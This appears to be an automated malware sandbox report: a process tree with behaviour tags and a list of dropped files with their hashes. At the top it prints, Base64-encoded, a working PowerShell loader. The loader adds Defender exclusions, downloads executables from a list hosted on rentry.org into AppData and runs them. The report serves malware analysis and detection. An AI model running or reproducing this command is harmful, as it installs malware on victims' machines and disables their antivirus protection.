C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5vapjf2h.trj2.exe"C:\Users\Admin\AppData\Roaming\5vapjf2h.trj2.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\5vapjf2h.trj3.exe"C:\Users\Admin\AppData\Roaming\5vapjf2h.trj3.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1520 -s 9442⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 464 -p 1520 -ip 15202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.414fe158-20b8-4020-9021-13bc4caeb2dc.tmp.csvFilesize
41KB
MD59acb0bfc1b662af9558a21266a22bba7
SHA1689a14f5261770852a1bb8130f3dd1b09bb15685
SHA256656e2dc2e270f8843d5855a67f4c7afeeccdfbf6abb4612626b7538eef2deabe
SHA5124c2df5770f2076e3dab0718aaafca8bf4565c11ac782a4d0d80b6f9e9035597c5bc766a94490834a36a0bb9cecc74e31701f738f2f195d9d3f7b133afd673296
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.504f8bb2-e3d0-4f21-a5d1-1558cdc6f600.tmp.txtFilesize
13KB
MD5aad7d4843e5a3e43c636fb7dd818ee8c
SHA19695ec6facdfdfd4b8ac9a75e75a863bf83b6fdc
SHA25658885671e33d63a517b0fd518af686fdb05bb5c67d040ec7b7f43081f6627cc3
SHA512e7476eb72f642535a605c7e4bebcfaca239fdbeeadd4fe1ed4711e42103339344632f6a22044dbbb79962bd8dd55bdfe7556f9a662567ff60c070046008092fc
-
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestampFilesize
46B
MD5751d0eecc9bf98c0a2726c2a9bc3e3df
SHA107a1cd8d1ede926e64f3c4025259572d164e581f
SHA2560e2fa79e4c5e970bcb011dfc74fd197515819d0701ec1f9be4127643aeb6dad1
SHA512fc2a5bc6736c53eafbfcb62a6b21cb0f4e007b850492a0dd64edceb3f4c6e694f8dfea05452791de9e8df4cfb7a647ebfcbf647473b0dbe754d326cba2daa5d2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\HXSoftware.exe.logFilesize
226B
MD54ae344179932dc8e2c6fe2079f9753ef
SHA160eacc624412b1f34809780769e3b212f138ea9c
SHA2563063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4
SHA512fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5aa0a32b11dca7b04f4cc5fe8c55cb357
SHA100e354fd0754a7d721a270cdc08f970b9a3f6605
SHA256e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1
SHA5121db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5a74887034b3a720c50e557d5b1c790bf
SHA1fb245478258648a65aa189b967590eef6fb167be
SHA256f25b27187fad2b82ac76fae98dfdddc1c04f4e8370d112d45c1dd17a8908c250
SHA512888c3fceb1a28a41c5449f5237ca27c7cbd057ce407f1542973478a31aa84ce9b77943130ca37551c31fa7cd737b9195b7374f886a969b39148a531530a91af3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD564f055a833e60505264595e7edbf62f6
SHA1dad32ce325006c1d094b7c07550aca28a8dac890
SHA2567172dc46924936b8dcee2d0c39535d098c2dbf510402c5bbb269399aed4d4c99
SHA51286644776207d0904bc3293b4fec2fa724b8b3c9c3086cd0ef2696027ab3d840a8049b6bde3464c209e57ffa83cbc3df6115500fbe36a9acb222830c1aac4dc7a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000fFilesize
36KB
MD5b23078951d91c38ad508e190a81517a4
SHA18dec45198f7dde8f6f30155817b7b03ef6eb570c
SHA2568f951f1e047ce385bb4a999785def042031f72f3039ea096c677393bfa918749
SHA51218da7c34c40298ebaefc6ced9b0b4769181addc85f192f258c70ac98b0275119a4e6f1aa938ed779fb73c9037036224a8b07dea403b9a5071996f2e3fa759e0c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010Filesize
48KB
MD547b6e3b9a667b9dbc766575634849645
SHA154c7e7189111bf33c933817d0a97cefe61fe9a6d
SHA256302ed4f6c8ac4312d71205603c4c28dd2976fafe4c05533c0a08ab3bdb531aa3
SHA512a12b74ff45f6f9e6abf459863c299e1fafe61dcf2bea8a7331ed9547de14ed29e2deba69b104c6960db93b458f83ba6a4ba454c5514105e7ffb96da96e26e612
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011Filesize
20KB
MD5357b4145c3264fe69f8c412e823adeed
SHA15fcaf1043bb72dbc719ce56a173b3da59db7ebc9
SHA2564bf695f9d9be4d4e815594d2b7443042ec14e4dcbaa6d35031cc0420b8009410
SHA512974c8b0220e6490324f5eda5590d4a895d7d67b87414ca1124dd01ac92e3bec033623bec67b4441fd6b69bb9034d4ee8210ee0f92fdf0a8efb6546e62ef8f7fa
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001dFilesize
20KB
MD54f462ea90211a0170c0fac3187824858
SHA1f90cc1b6f82e5f07739bd91b2b363e83716c826a
SHA256c61a598483428c78349280e539bab7ae8c19ffdbe31b1c7cbd98c3a4e4a129b7
SHA512f02a268d985f856d97df4eec61e9e16bcaa53a3bb068499723c996813afb6c93e7e980489126b21f720b580a69356001fc0c20e1337ad1f53c91071de0211776
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-indexFilesize
5KB
MD5447b741ba69e7222beb8d1dadb3bf122
SHA1de32b9506f42ba14276d57ed075fd55945e15bab
SHA256121d6bfa5429cda89e55aecbab1ca74b621ff3b5e2ed1a823689300509904e3c
SHA512aea83e657b13a98643d28ad1266dae7eb34d132338862889b117d2d82d8c75a6e6054cdcc69e34dca10dfcd3dde8004e3ecb86876969ab6cf10e6b4c212f071e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
3KB
MD5ca799d16a6398386750ad974c4adf24e
SHA1cb53ece84731422eda2f008fa556ead062db063e
SHA256245dd1186411d3cacce7523c3ef817f139b98aa27d40caea6d03bbaa9885e3e7
SHA5125beb02f8dede2d551c0d29d56d1f115e1d17dd18934cb74b06da07d67aa87c59aa694a1984e2f428adf2fc53a087b93f4445262bef16e2c719022f53c49c741a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
5KB
MD57366613ebdacc6c2d57cbed102e22ec7
SHA1894cadb749870f0209a45b5854caa21d51485256
SHA256716ff4697391b5ac75f332f2e93581226425805722f946014648a66c3ad67291
SHA512bf8cdd4322395a89642dd75411f469e4c01033afa857d8e53584813bb8eb92fb2d82b35d86c71847f7963503c60b88d476999741fbf19761b0c6b9d5606697cd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
5KB
MD5bde5d52a6346b0010ed260427e0f0fa1
SHA11aaf71d2ed0ec4f07baaf326d645ea47f31f1d60
SHA2560b6e762f3b70c4681bb4619452b9d8e9a76e74e10faf2d2e85e9017c95789cee
SHA5122b731df086a75825806a88b710af25c9f8fa089c9564a1c5e2043f7241e246f06f5d8fad652b105bb2825485b3ece2e7cd9aae52655483c2e2568e35e12fc89c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
5KB
MD5e1cf9f6b064ce43fd9c860a791087b46
SHA16d83bcb4f73ef45e317f3686ae28439be9601f25
SHA25689f506f17f27b9bee01f20554812f23f99282b53b961442740a824d604648d24
SHA5128ae25b29145d64d259402647070df2dd3e88e86101ea49bb9c4a8654a77bec049f407a1ac66e6649092156df7c3b3e7fe67a03770acf30e69794e1ddc289f0be
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD50f85f0d2e420126397927736f124ea6c
SHA1780406ca114514b4644955d24ee378ceeddeb206
SHA25660811ba895868ebbf878ab427814e1001a1082351a907e501de1d863bc0ddd3d
SHA512db3e15b53e9425e2bec84b91f69594205fc36a2f1c764fa162369aecd099e734d0c78a8349502daf3101d44c3186c900fc43281b699f7b074746d9a3a5a89d5c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD5455c390ec872c83626ae76d72e39c3a1
SHA1ca52cc3c02274c5f6f6c9c84e9e14ba0c1a863b8
SHA256c40e7c55d9b5735f17fe28285a42e574cbfc47e9e5fe28f48c51f9c61f3b1333
SHA512cae1fb7ef87046c1ca3ad1877953262f8cbbb478a656794b4d01d3ec4c1dea857f45325f3cd677e6ad79108e0aa09579804978ce8926e093662f0c47267fcf7a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD53a213e39138a7b8c1f40ef6555dfcf2e
SHA1f9c73d78c426e8cb3088ff6f5b949a9b486563ea
SHA25664a3ed00ab38a4ffc935dc677845980bafa1b20d72724a405145e2593ad151cc
SHA512ab7cf2df5492c8e517397653a1de4d810f7476749024a58f86b780cbfdca43aee64a3db604758e7fa7667061d4e07c7123a3899ea910cf9fed2cb5d235e2113f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5066bcae499d7c0c4ab4649b185ea61af
SHA1cd2315eef4f427029fb310d2134bc0da35bdeb11
SHA25607c8b270f2f5694535d812061d8b494129294fb6115e385bcb8e862e287f7f28
SHA5128250aec979c18e7d5c862142f066f05ace5e6cdf8f90d577bf1b909ac84bc09abc4517757a0fbd18a93d0d703a3462095265a5c095b5c2b247ebe2f61a37335b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD52fb0350728e4de3ac659a10ad6721768
SHA16d8631ee1581916abc6f45503a59f35172e97037
SHA2561a8057bfad72f8b6424d4b4f0f888f0d81d26972448aac804a5e4a0ac1fb5af4
SHA512ad1d3c6b97943262809b0273eb26e3054755e4a9cdec746ef2b51b59065c11e1e66787e06247fa74d6b31315300ba7fb38ad965a448771511f551e0e829b5a5b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5183bbf88e3b043a6e161c6481c47659e
SHA1cb28496283e439c235bd67e30cf2d910eabd3eb8
SHA2567c53456f6e813dfd6fd581687c3bbe8175e67acdd149e16885af2a1cf979a9b0
SHA5129f779db37385d0ebede93ff9fbe9e119d8b080d719cbd244203aa5faa8ce273544dedbce06bc08a9f82957e5074e34a31dbed956a90ca6e3f48c168d6bfb0e41
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
7KB
MD5853b6372dd1b30a26d592a2b010dccee
SHA151c3ef8a39974194a518a66aa4c5d7e805fc0f81
SHA25675b8045c4e63b1df446a80ea396834cd989c765eeccaf047da814ac652df4d24
SHA512ce9c497331d03b4e8bf57f508255e6e6095b4242773b027b82da2ebef7abdd55c853177c8d8173cc5c851e302cba47c4f5cd1fd723b98cfd7374cbb992357862
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5036f74e8a4d88fcd6728b8ac7e52ad96
SHA1e340c9a61c4a2d9701585a3853794bd742dad680
SHA2563a3a234458fb19617e94f240084697a4026cf50dc92aab0d88e20ec1dccd75bc
SHA51262798fad87b7bc329adb395dcd2512c30583c5a310e4cae8d2f5d5a0a7c06311afefa90ff8782f6802fc43a47a3070fc5ff34a3421b22322df56645da0c42c2b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
7KB
MD506a847f7c38a88c3e651993cad32d291
SHA10803293c134e3c602370d2ce8b1d2ebc47c48515
SHA2567a0533d95d0ba11112268d8eea34cba022ea52a58e43f596f107e930671ba87c
SHA51272a9bdbb1efd95db66b112518f31738beff4551c5b0dff92db3a9644c59b04f684a8a0e022bf7b846962e22813e096fc9a5eb8941de443db0c8777ee9f951859
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
7KB
MD5dc83d499390109aaad6278e070174789
SHA1e019f01c7f79ecb8b2b1ff20a7e53cd1a63af5be
SHA256719b6475bd78138e90581f6065925445fe8ccbdf46b40d676a5dae48bc31a377
SHA512e7c38128d8414accbb28145af89c3cb77425cc06d6f04fd8a667df50c4b422b53652d9682a20fda23c7b0cfac7468b315497f7f5fa692b94cd03f92843df66fb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD50988632d9c93c2d3eb299a534dff8c98
SHA147252fd0fd8d3ab8fe6e218ea27cd9478196c6ae
SHA256e5d5997fe7803bdcded41e678327da9c4ceab5b982656ef561dfeebfdda8edfa
SHA5124bbeb46d7d6f5b9b2b1615a88c071fa628f6678c43bd3af5f5744912c5110312b418c09869ad88e6946c709f77f7e0d25a7f549d8bacf1bffab9aefadcaf1986
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD566f3b4b4284bfb4e13360e68f6f700e3
SHA1f8203fe3eb09ee1eb19dd83449c90d546de0f4d2
SHA2569997a4a37ef79cec2e6d4473223249a9f47b154de378d5132db84abaa84e6669
SHA512d6f049572d27575d01ae25bd145fe486a408382032c77018e311c28ac1335b6da3307aa64102a6c6cfd08259dc9aa421cb5dc8cc600fdc870be0db2f6530d57e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5485b47a6c702827ccb41040332144059
SHA1f5ce316684fd651ef26e7305324f91197f9ec58a
SHA25691e9eaf1f6956eb70e36706495357df6bc927909dbc11b0e6538f292a77ff8ee
SHA51247a5c2b59c34b8a19edaa8be85983e7af31c18f08d81d35d6a12b995be352f19d9f11bd748fd87a68cb6811d927fe97e3996feae7e4f5f8223a5d25418a89e35
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD54931c744175f77f6928adb3323d5885c
SHA1b98be1e7accd496302feaa4243333369c3e8fcda
SHA2560d97d42b017c892565988b2df3b1cc1ddedb183bb6150eedcf1b6446f9841029
SHA512af7e257525bccc8d4083741037d328e26618d83a93058ef456c0930b81abe781ddacd4f96ae42bfae7070ee4cce7f70e773143fb2777bf9e996e692e5f4f3397
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD54aa26b122640d3f93706b5f52e840bae
SHA125692aef2701533f4d428c0b8621b0b9b041ad67
SHA256bac2e899f394a401b9ef0e01f4a4998b8ad9c9bf1eff1c9395225c7ea325c8c3
SHA51237722676b3021a1e15aa13a1cea979cbc278327a865376dabd9501a772139ca247d5c6d9c155bed2b48e663154a9fb1100c2dd4e7a2d806c42110e72fe6176dc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD573b38d2bd933fa7608245c9c846724e9
SHA1748a21cdbafaca5c4fe2fb30266f8a1b688004c9
SHA25654aeb89ff45c887de560fe3da637b9b1c59956efdbe3c519a57463f21ffd9acc
SHA512223ec6366748e8398f81244d622b6732a73dcd1b1e2b96f0265021d3d2fbd634634a241967179ab4864d65903232716ed4a4c6ec0dddb05fd6921d0f0b9d1e03
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5f0c3365ee90407291d4b2c68a6cb574e
SHA112c2604e3f776be96711636df9bc0fbe1aade19a
SHA25695b50b4f051f5a7bfbc38b33d34fae53e02e394502b9d6af97235069ee195b70
SHA512d6f8969ba13145c167c5d3a9cacd326ecc2150c60b75ea53e3c3cc7784c6ee82f99be0566f1cc967b5ae1a3ab018b6f563432dca4f28d904cbcba1347ce1c432
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58a37e.TMPFilesize
1KB
MD50da399fbc4390dd58d176f955653b6c1
SHA1fd90f811144cf37a53afdd4f34fce8482a9a2b50
SHA25608075edddfeccc4ce00aadf1bc356f12b25e8fe6d83ca07268a1814d0fbf7827
SHA512ca3f5c36ba84de66243a8b2c6389898e6fa921e07e45e8f7eb29bbcaeabbb512e8f9a8bc10ac1ab4726e2bac7c94c05e9c1ea910f6a2913cffcaae5b787ac8f9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD537b9540c27eb83e9c6e876b80545884d
SHA17b556f20807e8917acbae1ff75908c84d9974b4b
SHA2564cd4f0517419890886fd5e27ec740a318b187a8bac6111ca2bb02059bc7d2179
SHA512a15ee44ee7708516c53ea0b5f617a59a5d9fe0976ff42a4bb7a11b2be7b8e9d3eafffac684d4c190ab7d4f51276b6e68e033c99681ff0c54d172c60c49b8a004
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD5187c9bd2022fd2d6bd735f665596008c
SHA1bc595e7e7f1c9bf216f181f9335a4cb54a9a9e06
SHA256b07db4e9cb99dcafbeb9e17eb813a2f0e7054482b9fd1e110ab7e41b394b2239
SHA512f5e36e11cdb621e8e43599d17c049f4b3a98ebd4ecd0c42fbfc26add26d90148952933a7c897aedfaed6d59d96428fd0225624f01bcb7af48957136a593f2c82
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b666adc850de0049c5552e7198f1e5cd
SHA154a5da472342e8b7979799f98c050241a60eac0c
SHA256ab9f1fa398647072caaaeebf4690532d870f8e7257eb10c2f446f2961a65f641
SHA512b0b5d30094959231df81e2645770d61ad118ce0683c2b127d2e5e10d36c12185cb74684d3c3dd4b466882e8de428713eb8b9ef1539049aefb7992e758c7f8a68
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ee1e607b6315eac895db6209069dceb6
SHA19c36204f7011c96e6a0bcc10d1fc1deddc00ff5e
SHA2567113815f01d20c8d2fa86a3b15dc253895250ae7b76b9a9cc317b4e9f351d09f
SHA512692676c2f18ccd0e5195d91ec4d952b447358256bc39a17697b6ffb0468bd5c1a2bf0281af914cb1e327f95e38532d18a3083e05ca64d529978b7a993b16ceb6
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
330B
MD5a0c6334a6d8961a89908fca18f2ff2eb
SHA143069e46a6f284047e219d7e9d74d6911d24f746
SHA256ea721ec86cda0ebb6f1fe8bfe891fbecc14419af1726b10f63b29496634cbba9
SHA512f094282a9eeae74ff2c88443c0ad769bf393e8798232071416f5b1d662abbcb4d49d59f2abe7b268c956e1b44da5a85bc3102f0859771bcb51f2819ae4c814bf
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gvx2roh5.mfc.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\b0mjkh2j.jz52.exeFilesize
355KB
MD5c93d65bc0ed7ee88d266b4be759301f8
SHA18c0c415ba824737c61904676e7132094f5710099
SHA256f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f
SHA5127a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1
-
C:\Users\Admin\AppData\Roaming\b0mjkh2j.jz53.exeFilesize
5.2MB
MD5f55fc8c32bee8f7b2253298f0a0012ba
SHA1574c7a8f3eb378c03f58bc96252769296b20970e
